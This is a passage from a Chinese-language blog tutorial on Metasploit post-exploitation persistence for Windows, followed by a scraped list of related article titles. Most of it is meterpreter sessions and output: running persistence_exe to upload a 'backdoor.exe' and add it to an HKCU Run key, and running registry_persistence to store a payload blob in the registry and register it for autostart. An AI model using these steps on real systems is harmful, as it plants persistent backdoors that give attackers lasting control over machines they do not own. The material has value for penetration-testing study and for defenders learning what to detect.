三个文件上传成功,但服务没有启动起来,失败了。使用-r参数可卸载服务。

(3)persistence\_exe

再来看看官方推荐的东西吧

meterpreter > info post/windows/manage/persistence_exeName: Windows Manage Persistent EXE Payload InstallerModule: post/windows/manage/persistence_exePlatform: WindowsArch: Rank: NormalProvided by:Merlyn drforbin Cousins <drforbin6@gmail.com>Compatible session types:MeterpreterBasic options:Name      Current Setting  Required  Description----      ---------------  --------  -----------REXENAME  default.exe      yes       The name to call exe on remote systemREXEPATH                   yes       The remote executable to upload and execute.SESSION                    yes       The session to run this module on.STARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE)Description:This Module will upload an executable to a remote host and make it Persistent. It can be installed as USER, SYSTEM, or SERVICE. USER will start on user login, SYSTEM will start on system boot but requires privs. SERVICE will create a new service which will start the payload. Again requires privs.Module options (post/windows/manage/persistence_exe):Name      Current Setting  Required  Description----      ---------------  --------  -----------REXENAME  default.exe      yes       The name to call exe on remote systemREXEPATH                   yes       The remote executable to upload and execute.SESSION                    yes       The session to run this module on.STARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE)

此模块将可执行文件上载到远程主机并进行创建持久性。 涉及到四个参数

  • REXENAME是拷贝到目标系统中的名字
  • EXEPATH是将要上传的后门在本地的位置
  • SESSION是选择运行此模块的会话
  • STARTUP是启动类型,有USER、SYSTEM、SERVICE这三种取值,USER表示为将在用户登录时启动,SYSTEM表示将在系统启动时启动(需要权限),SERVICE表示将创建一个启动服务项(需要权限)。

尝试一下:

meterpreter > run post/windows/manage/persistence_exe REXENAME=backdoor.exe REXEPATH=/home/ubuntu/shell.exe STARTUP=USER[*] Running module against SAUCERMAN
[*] Reading Payload from file /home/ubuntu/shell.exe
[+] Persistent Script written to C:\Users\TideSec\AppData\Local\Temp\backdoor.exe
[*] Executing script C:\Users\TideSec\AppData\Local\Temp\backdoor.exe
[+] Agent executed with PID 3684
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\mEMZDQOxkkeebI
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\mEMZDQOxkkeebI
[*] Cleanup Meterpreter RC File: /home/ubuntu/.msf4/logs/persistence/SAUCERMAN_20190612.1023/SAUCERMAN_20190612.1023.rc

(4)registry\_persistence

完整路径为exploit/windows/local/registry\_persistence

和第一种方法类似,此模块将会安装一个payload到注册表的启动项中。

meterpreter > background
[*] Backgrounding session 13...
msf5 auxiliary(server/socks5) > use exploit/windows/local/registry_persistence
msf5 exploit(windows/local/registry_persistence) > show optionsModule options (exploit/windows/local/registry_persistence):Name           Current Setting  Required  Description----           ---------------  --------  -----------BLOB_REG_KEY                    no        The registry key to use for storing the payload blob. (Default: random)BLOB_REG_NAME                   no        The name to use for storing the payload blob. (Default: random)CREATE_RC      true             no        Create a resource file for cleanupRUN_NAME                        no        The name to use for the 'Run' key. (Default: random)SESSION                         yes       The session to run this module on.SLEEP_TIME     0                no        Amount of time to sleep (in seconds) before executing payload. (Default: 0)STARTUP        USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM)Exploit target:Id  Name--  ----0   Automaticmsf5 exploit(windows/local/registry_persistence) > set SESSION 13
SESSION => 13
msf5 exploit(windows/local/registry_persistence) > run[*] Generating payload blob..
[+] Generated payload, 6048 bytes
[*] Root path is HKCU
[*] Installing payload blob..
[+] Created registry key HKCU\Software\0BaG3zDR
[+] Installed payload blob to HKCU\Software\0BaG3zDR\iiEB4InD
[*] Installing run key
[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SMPqA5kB
[*] Clean up Meterpreter RC file: /home/ubuntu/.msf4/logs/persistence/192.168.81.154_20190612.2138/192.168.81.154_20190612.2138.rc

同类型的还有其他payload,如exploit/windows/local/vss\_persistenceexploit/windows/local/s4u\_persistence

结语

记录了一些MSF的使用姿势

metasploit framework的一些使用姿势(持续更新)相关推荐

  1. 【展讯平台】Android 驱动(Kernel)、系统(framework) 定制,调试日志,持续更新中..

    前言 [展讯平台]Android 4.4 驱动(Kernel).系统(framework) 定制,调试日志 正文 1:提高串口日志等级 查看 adb shell cat /proc/sys/kerne ...

  2. 【学术相关】CVPR2021最新接收论文合集!22个方向100+篇论文汇总|持续更新

    报道丨极市平台 导读 CVPR2021结果已出,本文为CVPR最新接收论文的资源汇总贴,附有相关文章与代码链接. 文章在Github上持续更新,欢迎大家 star/fork(点击阅读原文即可跳转): ...

  3. Metasploit Framework(MSF)的使用

    目录 Metasploit Metasploit的安装和升级 MSF中加载自定义的exploit模块 漏洞利用(exploit) 攻击载荷(payload) Meterpreter MS17_010( ...

  4. 《李斌的笔记》全部文章目录 / 快速导航 / 持续更新

    <李斌的笔记>全部文章目录.快速导航.持续更新 简介: 我把自己的全部文章都整理成目录,放在这篇文章中以实现快速导航,点击文章标题就能跳转,这样更方便阅读,本章内容持续更新. 关键字:李斌 ...

  5. Java 最常见的 10000+ 面试题及答案整理:持续更新

    Java面试题以及答案整理[最新版]Java高级面试题大全(2021版),发现网上很多Java面试题都没有答案,所以花了很长时间搜集,本套Java面试题大全,汇总了大量经典的Java程序员面试题以及答 ...

  6. ECCV2020 收录论文汇总(持续更新中)附打包下载

    2020极市计算机视觉开发者榜单已于2020年7月20日开赛,8月31日截止提交,基于火焰识别.电动车头盔识别.后厨老鼠识别.摔倒识别四个赛道,47000+数据集,30万奖励等你挑战!点击这里报名 极 ...

  7. Metasploit Framework 简介与使用

    Metasploit Framework是一个编写,测试和使用exploit代码的完善环境.这个环境为渗透测试,shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Perl ...

  8. Metasploit Framework(1)基本命令、简单使用

    文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 基本的控制台命令介绍: banner 查看metasp ...

  9. netcore开源框架_.NET Core开发精选文章目录,持续更新,欢迎投稿!

    收集的一些.NET Core开发的文章,持续更新,欢迎投稿! 0.文章目录 布莱恩特:@.NET程序员,请了解这8种.NET 内存泄露方式! 布莱恩特:ASP.NET Core 性能优化22条最佳实践 ...

  10. petapoco mysql_PetaPocoEfCoreMvc[持续更新]欢迎在github上star

    原标题:PetaPocoEfCoreMvc[持续更新]欢迎在github上star Us PetaPoco and Entity Framework Core 进行开发的一个样例项目 PetaPoco ...

最新文章

  1. 第十、十一周项目五 - 摩托车继承自行车和机动车
  2. python语言if语句-Python在if语句中等同于(logical-and)
  3. 【AMAD】import-string -- 通过字符串来import一个对象
  4. 一个可供参考的Java高并发异步应用案例--转
  5. 转向AIOps之前,你应该做好哪些准备?
  6. k8s四种port解析:nodePort、port、targetPort、containerPort
  7. 使用git时ssh提示“Load key /home/devid/.ssh/id_rsa: bad permissions”的解决办法
  8. SAP Spartacus page-slot.component.html
  9. linux系统服务器可能被攻击的几种攻击方式
  10. 跳跃表(Skip list)原理与java实现
  11. Ubuntu 星际译王StarDict
  12. redis内存淘汰和持久化_REDIS的淘汰机制与持久化
  13. *[topcoder]HexagonalBoard
  14. 第2章 信息系统集成及服务管理
  15. 营业执照生成_电子营业执照如何获取?
  16. python 学习目录
  17. UEFI开发探索101 – PCD探究
  18. iOS 日记app的制作过程(Objective-C)
  19. 软件开发的过程中,这些文档你都用到了吗?
  20. ps aux含义linux,Linux下ps aux解释

热门文章

  1. 以面试的方式了解消息中间件MQ与RabbitMQ
  2. OAuth2 oauth_client_details表字段的详细说明
  3. Factory(工厂)模式
  4. ios-AddressBook框架
  5. npm init vite@latest 报错
  6. python淘宝cookies抢购_Python爬虫利用cookie抓取淘宝商品比价
  7. 【优化求解】基于天牛须算法PID控制器优化设计matlab代码
  8. 基于Matlab的数字水印设计
  9. macd底背离的python_java尝试编写macd,试验顶背离底背离
  10. beacon帧主要结构